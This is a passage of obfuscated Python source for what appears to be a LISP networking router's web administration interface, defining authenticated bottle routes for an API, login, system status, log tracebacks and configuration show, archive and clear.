elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 45 - 45: O0 * o0oOOo0O0Ooo % Oo0Ooo * OoooooooOO + iII111i . OoOoOO00
if 67 - 67: i11iIiiIii - i1IIi % I1ii11iIi11i . O0
if ( data_structure in [ "map-server" , "database-mapping" ] ) :
if ( lisp . lisp_is_running ( "lisp-etr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-etr" )
elif ( lisp . lisp_is_running ( "lisp-itr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-itr" )
else :
return ( json . dumps ( [ ] ) )
if 77 - 77: IiII / I1IiiI
if 15 - 15: IiII . iIii1I11I1II1 . OoooooooOO / i11iIiiIii - Ii1I . i1IIi
if ( data_structure in [ "site-cache" , "site-cache-summary" ] ) :
if ( lisp . lisp_is_running ( "lisp-ms" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-ms" )
else :
return ( json . dumps ( [ ] ) )
if 33 - 33: I11i . o0oOOo0O0Ooo
if 75 - 75: o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
lisp . lprint ( "Waiting for api get-data '{}', parmameters: '{}'" . format ( data_structure , data ) )
if 91 - 91: O0
if 61 - 61: II111iiii
O0OOO , II11iIiIIIiI , o0o , o00 = lisp . lisp_receive ( O0OOo , True )
lisp . lisp_ipc_lock . release ( )
return ( o00 )
if 56 - 56: I1IiiI - Oo0Ooo . Ii1I - IiII
if 73 - 73: Oo0Ooo - i1IIi - i1IIi - iII111i . Ii1I + I1ii11iIi11i
if 81 - 81: iII111i * oO0o - I1Ii111 . II111iiii % I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
@ bottle . route ( '/lisp/api' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "put" )
@ bottle . route ( '/lisp/api/<command>' , method = "delete" )
def oOOo0oOo0 ( command = "" ) :
O000oo = [ { "?" : [ { "?" : "not-auth" } ] } ]
if ( bottle . request . auth == None ) : return ( O000oo )
if 49 - 49: Oo0Ooo . i11iIiiIii - i1IIi / II111iiii . I1IiiI
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if ( bottle . request . auth != None ) :
O0O00Ooo , OOoooooO = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( O0O00Ooo , OOoooooO ) == False ) :
return ( json . dumps ( O000oo ) )
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( O000oo ) )
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( O000oo ) )
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if ( command == "user-account" ) :
if ( lispconfig . lisp_is_user_superuser ( O0O00Ooo ) == False ) :
O000oo = [ { "user-account" : [ { "?" : "not-auth" } ] } ]
return ( json . dumps ( O000oo ) )
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
Ooo = bottle . request . body . readline ( )
if ( Ooo == "" ) :
O000oo = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( O000oo ) )
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
O000oo = json . loads ( Ooo )
if ( command != "" ) :
command = "lisp " + command
else :
command = O000oo [ 0 ] . keys ( ) [ 0 ]
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
lisp . lisp_ipc_lock . acquire ( )
if ( bottle . request . method == "DELETE" ) :
O000oo = lispconfig . lisp_remove_clause_for_api ( O000oo )
else :
O000oo = lispconfig . lisp_put_clause_for_api ( O000oo )
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
lisp . lisp_ipc_lock . release ( )
return ( json . dumps ( O000oo ) )
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
@ bottle . route ( '/lisp/show/api-doc' , method = "get" )
def oO0OOOO0 ( ) :
if ( os . path . exists ( "lispapi.py" ) ) : os . system ( "pydoc lispapi > lispapi.txt" )
if ( os . path . exists ( "lispapi.txt" ) == False ) :
return ( "lispapi.txt file not found" )
if 26 - 26: Ii1I
return ( bottle . static_file ( "lispapi.txt" , root = "./" ) )
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
if 47 - 47: iII111i - Ii1I . II111iiii + OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
@ bottle . route ( '/lisp/show/command-doc' , method = "get" )
def oO ( ) :
return ( bottle . static_file ( "lisp.config.example" , root = "./" ,
mimetype = "text/plain" ) )
if 31 - 31: OOooOOo + i11iIiiIii + Oo0Ooo * ooOoO0o
if 28 - 28: O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * Ii1I - i11iIiiIii
if 7 - 7: Oo0Ooo + oO0o - I1Ii111 % Ii1I + I1ii11iIi11i
if 53 - 53: i1IIi - I11i . OoOoOO00
if 39 - 39: II111iiii / ooOoO0o + I1Ii111 / OoOoOO00
if 13 - 13: IiII + O0 + iII111i % I1IiiI / o0oOOo0O0Ooo . IiII
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
@ bottle . route ( '/lisp/show/lisp-xtr' , method = "get" )
def oOOoo00O00o ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 97 - 97: O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if ( os . path . exists ( "./show-ztr" ) ) :
ii1111iII = open ( "./show-ztr" , "r" ) ; iiiiI = ii1111iII . read ( ) ; ii1111iII . close ( )
else :
ii1111iII = open ( "./show-xtr" , "r" ) ; iiiiI = ii1111iII . read ( ) ; ii1111iII . close ( )
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
i1 = ""
iiiiI = iiiiI . split ( "\n" )
for OOoO in iiiiI :
if ( OOoO [ 0 : 4 ] == " " ) : i1 += lisp . lisp_space ( 4 )
if ( OOoO [ 0 : 2 ] == " " ) : i1 += lisp . lisp_space ( 2 )
i1 += OOoO + "<br>"
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
i1 = lisp . convert_font ( i1 )
return ( lisp . lisp_print_sans ( i1 ) )
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
@ bottle . route ( '/lisp/show/<xtr>/keys' , method = "get" )
def OOoOO0o0o0 ( xtr ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 11 - 11: I1IiiI
I1111i = lispconfig . lisp_is_user_superuser ( None )
if 14 - 14: OOooOOo / o0oOOo0O0Ooo
if ( I1111i == False ) :
o00 = "Permission denied"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 32 - 32: I1IiiI * Oo0Ooo
if 78 - 78: OOooOOo - OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii
if ( xtr not in [ "itr" , "etr" , "rtr" ] ) :
o00 = "Invalid URL"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( o00 ) ) )
if 29 - 29: I1IiiI % I1IiiI
Oo0O0 = "show {}-keys" . format ( xtr )
return ( lispconfig . lisp_process_show_command ( O0OOo , Oo0O0 ) )
if 82 - 82: II111iiii % I11i / OoO0O00 + OoOoOO00 / o0oOOo0O0Ooo / I1Ii111
if 70 - 70: oO0o
if 59 - 59: o0oOOo0O0Ooo % oO0o
if 6 - 6: iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 93 - 93: IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
@ bottle . route ( '/lisp/geo-map/<geo_prefix>' )
def i1I1i111Ii ( geo_prefix ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 67 - 67: I1IiiI . i1IIi
if 27 - 27: ooOoO0o % I1IiiI
geo_prefix = geo_prefix . split ( "-" )
geo_prefix = "-" . join ( geo_prefix [ 0 : - 1 ] ) + "/" + geo_prefix [ - 1 ]
o0oooOO00 = lisp . lisp_geo ( "" )
o0oooOO00 . parse_geo_string ( geo_prefix )
iiIiii1IIIII , o00o = o0oooOO00 . dms_to_decimal ( )
II = o0oooOO00 . radius * 1000
if 7 - 7: I1ii11iIi11i - I1IiiI . iIii1I11I1II1 - i1IIi
o0OOOoO0 = open ( "./lispers.net-geo.html" , "r" ) ; o0OoOo00o0o = o0OOOoO0 . read ( ) ; o0OOOoO0 . close ( )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$LAT" , str ( iiIiii1IIIII ) )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$LON" , str ( o00o ) )
o0OoOo00o0o = o0OoOo00o0o . replace ( "$RADIUS" , str ( II ) )
return ( o0OoOo00o0o )
if 41 - 41: ooOoO0o % OoO0O00 - Oo0Ooo * I1Ii111 * Oo0Ooo
if 69 - 69: OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
@ bottle . route ( '/lisp/login' , method = "get" )
def O0O00Oo ( ) :
return ( lispconfig . lisp_login_page ( ) )
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
@ bottle . route ( '/lisp/login' , method = "post" )
def oOoOOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) ) :
return ( lispconfig . lisp_landing_page ( ) )
if 84 - 84: OoO0O00 + i1IIi - II111iiii . I1ii11iIi11i * OoooooooOO + I1IiiI
return ( O0O00Oo ( ) )
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
@ bottle . route ( '/lisp' )
def OoOoo00Ooo00 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 57 - 57: I1Ii111
return ( lispconfig . lisp_landing_page ( ) )
if 32 - 32: Ii1I - Oo0Ooo % OoooooooOO . iII111i / IiII + I1IiiI
if 76 - 76: ooOoO0o
if 73 - 73: O0 * iII111i + Ii1I + ooOoO0o
if 40 - 40: II111iiii . OoOoOO00 * I1Ii111 + OOooOOo + OOooOOo
if 9 - 9: I11i % OoooooooOO . oO0o % I11i
if 32 - 32: i11iIiiIii
if 31 - 31: iIii1I11I1II1 / OoO0O00 / I1ii11iIi11i
@ bottle . route ( '/lisp/traceback' )
def iiIiIi ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 39 - 39: I1Ii111
if 91 - 91: OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoOoOO00 + O0
iIiii1iI1 = True
if 33 - 33: IiII % iIii1I11I1II1 * I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if ( os . path . exists ( "./logs/lisp-traceback.log" ) ) :
o00 = commands . getoutput ( "cat ./logs/lisp-traceback.log" )
if ( o00 ) :
o00 = o00 . replace ( "----------" , "<b>----------</b>" )
o00 = o00 . replace ( "\n" , "<br>" )
iIiii1iI1 = False
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if ( iIiii1iI1 ) :
o00 = ""
I1i = "egrep --with-filename Traceback ./logs/*.log"
iIII = commands . getoutput ( I1i )
iIII = iIII . split ( "\n" )
for o0o0O in iIII :
if ( o0o0O . find ( ":" ) == - 1 ) : continue
OOoO = o0o0O . split ( ":" )
if ( OOoO [ 1 ] == "0" ) : continue
o00 += "Found Tracebacks in log file {}<br>" . format ( OOoO [ 0 ] )
iIiii1iI1 = False
if 68 - 68: ooOoO0o
o00 = o00 [ 0 : - 4 ]
if 25 - 25: I1ii11iIi11i . ooOoO0o
if 24 - 24: oO0o / i11iIiiIii + oO0o
if ( iIiii1iI1 ) :
o00 = "No Tracebacks found - a stable system is a happy system"
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
if 88 - 88: OoOoOO00 / II111iiii
o00 = lisp . lisp_print_cour ( o00 )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 87 - 87: I1ii11iIi11i - I1ii11iIi11i - iII111i + oO0o
if 82 - 82: oO0o / iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
@ bottle . route ( '/lisp/show/not-supported' )
def oOoO0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 77 - 77: iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
return ( lispconfig . lisp_not_supported ( ) )
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
@ bottle . route ( '/lisp/show/status' )
def I1ii11 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 74 - 74: Oo0Ooo - o0oOOo0O0Ooo . i1IIi
if 43 - 43: iII111i / I1IiiI
if 58 - 58: I1IiiI + i11iIiiIii % Ii1I . OoOoOO00
if 13 - 13: i11iIiiIii + i1IIi * iIii1I11I1II1 % OoooooooOO - II111iiii * OOooOOo
if 26 - 26: OoooooooOO * I1IiiI + OOooOOo
o00 = ""
I1111i = lispconfig . lisp_is_user_superuser ( None )
if ( I1111i ) :
IiIii1i111 = lisp . lisp_button ( "show configuration" , "/lisp/show/conf" )
iI = lisp . lisp_button ( "show configuration diff" , "/lisp/show/diff" )
o0o00 = lisp . lisp_button ( "archive configuration" , "/lisp/archive/conf" )
IIi = lisp . lisp_button ( "clear configuration" , "/lisp/clear/conf/verify" )
o0o0O = lisp . lisp_button ( "log flows" , "/lisp/log/flows" )
oOoO00oo0O = lisp . lisp_button ( "install LISP software" , "/lisp/install/image" )
IiiiI = lisp . lisp_button ( "restart LISP subsystem" , "/lisp/restart/verify" )
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
o00 = "<center>{}{}{}{}{}{}{}</center><hr>" . format ( IiIii1i111 , iI , o0o00 , IIi ,
o0o0O , oOoO00oo0O , IiiiI )
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
O00o0OO0000oo = commands . getoutput ( "uptime" )
i1OO0oOOoo = commands . getoutput ( "uname -pv" )
oOOO00o000o = lisp . lisp_version . replace ( "+" , "" )
if 9 - 9: oO0o + I11i / I11i
if 12 - 12: OoooooooOO % o0oOOo0O0Ooo * I11i % iIii1I11I1II1 / Ii1I
if 27 - 27: i11iIiiIii % II111iiii % I11i . O0 - Oo0Ooo + OoOoOO00
if 57 - 57: iIii1I11I1II1 / I11i - i1IIi
if 51 - 51: IiII
ii11I1 = multiprocessing . cpu_count ( )
if 75 - 75: OoO0O00 / II111iiii % O0
Ii111iIi1iIi = O00o0OO0000oo . find ( ", load" )
O00o0OO0000oo = O00o0OO0000oo [ 0 : Ii111iIi1iIi ]
IIIII = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
if 78 - 78: Ii1I * i1IIi
iI11 = "Not available"
if 96 - 96: OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
Oo0O0 = "ps auww" if lisp . lisp_is_macos ( ) else "ps aux"
ooo0O = commands . getoutput ( "{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep" . format ( Oo0O0 ) )
if 16 - 16: OoOoOO00
if 41 - 41: i1IIi * II111iiii / OoooooooOO . OOooOOo
ooo0O = ooo0O . replace ( " " , lisp . space ( 1 ) )
ooo0O = ooo0O . replace ( "\n" , "<br>" )
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if ( i1OO0oOOoo . find ( "Darwin" ) != - 1 ) :
ii11I1 = ii11I1 / 2
iI11 = commands . getoutput ( "top -l 1 | head -50" )
iI11 = iI11 . split ( "PID" )
iI11 = iI11 [ 0 ]
if 45 - 45: I1Ii111
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
Ii111iIi1iIi = iI11 . find ( "Load Avg" )
O000OOO0OOo = iI11 [ 0 : Ii111iIi1iIi ] . find ( "threads" )
i1i1I111iIi1 = iI11 [ 0 : O000OOO0OOo + 7 ]
iI11 = i1i1I111iIi1 + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "CPU usage" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "SharedLibs:" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "MemRegions" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "PhysMem" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "VM:" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "Networks" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
Ii111iIi1iIi = iI11 . find ( "Disks" )
iI11 = iI11 [ 0 : Ii111iIi1iIi ] + "<br>" + iI11 [ Ii111iIi1iIi : : ]
else :
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
iiiiI = commands . getoutput ( "top -b -n 1 | head -50" )
iiiiI = iiiiI . split ( "PID" )
iiiiI [ 1 ] = iiiiI [ 1 ] . replace ( " " , lisp . space ( 1 ) )
iiiiI = iiiiI [ 0 ] + iiiiI [ 1 ]
iI11 = iiiiI . replace ( "\n" , "<br>" )
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
O0O0Ooooo000 = commands . getoutput ( "cat release-notes.txt" )
O0O0Ooooo000 = O0O0Ooooo000 . replace ( "\n" , "<br>" )
if 65 - 65: OOooOOo * I1Ii111
o00 += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
''' . format ( oOOO00o000o , lisp . lisp_version , Oo0oO0ooo , IIIII ,
O00o0OO0000oo , lisp . lisp_space ( 1 ) , ii11I1 , i1OO0oOOoo , ooo0O , iI11 ,
O0O0Ooooo000 )
if 79 - 79: OoooooooOO - I1IiiI
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 69 - 69: I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
@ bottle . route ( '/lisp/show/conf' )
def iI1iIIIi1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 89 - 89: iIii1I11I1II1
return ( bottle . static_file ( "lisp.config" , root = "./" , mimetype = "text/plain" ) )
if 21 - 21: I11i % I11i
if 27 - 27: i11iIiiIii / I1ii11iIi11i
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
@ bottle . route ( '/lisp/show/diff' )
def IiII1II11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 54 - 54: IiII + O0 + I11i * I1Ii111 - OOooOOo % oO0o
return ( bottle . static_file ( "lisp.config.diff" , root = "./" ,
mimetype = "text/plain" ) )
if 13 - 13: ooOoO0o / iII111i * OoO0O00 . OoO0O00 * ooOoO0o
if 63 - 63: I1Ii111 / O0 * Oo0Ooo + II111iiii / IiII + Ii1I
if 63 - 63: OoO0O00 + I1ii11iIi11i . I1Ii111 % I1Ii111
if 57 - 57: II111iiii
if 54 - 54: Oo0Ooo + oO0o + i11iIiiIii
if 28 - 28: oO0o
if 70 - 70: IiII
@ bottle . route ( '/lisp/archive/conf' )
def i11i1iiI1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
lisp . lisp_ipc_lock . acquire ( )
os . system ( "cp ./lisp.config ./lisp.config.archive" )
lisp . lisp_ipc_lock . release ( )
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
o00 = "Configuration file saved to "
o00 = lisp . lisp_print_sans ( o00 )
o00 += lisp . lisp_print_cour ( "./lisp.config.archive" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
@ bottle . route ( '/lisp/clear/conf' )
def iI11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( O0O00Oo ( ) )
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
os . system ( "cp ./lisp.config ./lisp.config.before-clear" )
lisp . lisp_ipc_lock . acquire ( )
O0O0oOOo0O ( )
lisp . lisp_ipc_lock . release ( )
if 19 - 19: o0oOOo0O0Ooo / I1Ii111 % o0oOOo0O0Ooo % iII111i * IiII
o00 = "Configuration cleared, a backup copy is stored in "
o00 = lisp . lisp_print_sans ( o00 )
o00 += lisp . lisp_print_cour ( "./lisp.config.before-clear" )
return ( lispconfig . lisp_show_wrapper ( o00 ) )
if 19 - 19: iIii1I11I1II1
if 26 - 26: OoooooooOO % I1IiiI % Oo0Ooo . I1IiiI % Ii1I
if 34 - 34: IiII / OoOoOO00
if 87 - 87: O0 * o0oOOo0O0Ooo * Oo0Ooo * II111iiii
if 6 - 6: i1IIi . I1ii11iIi11i + OoOoOO00 * I11i / OoOoOO00 % oO0o
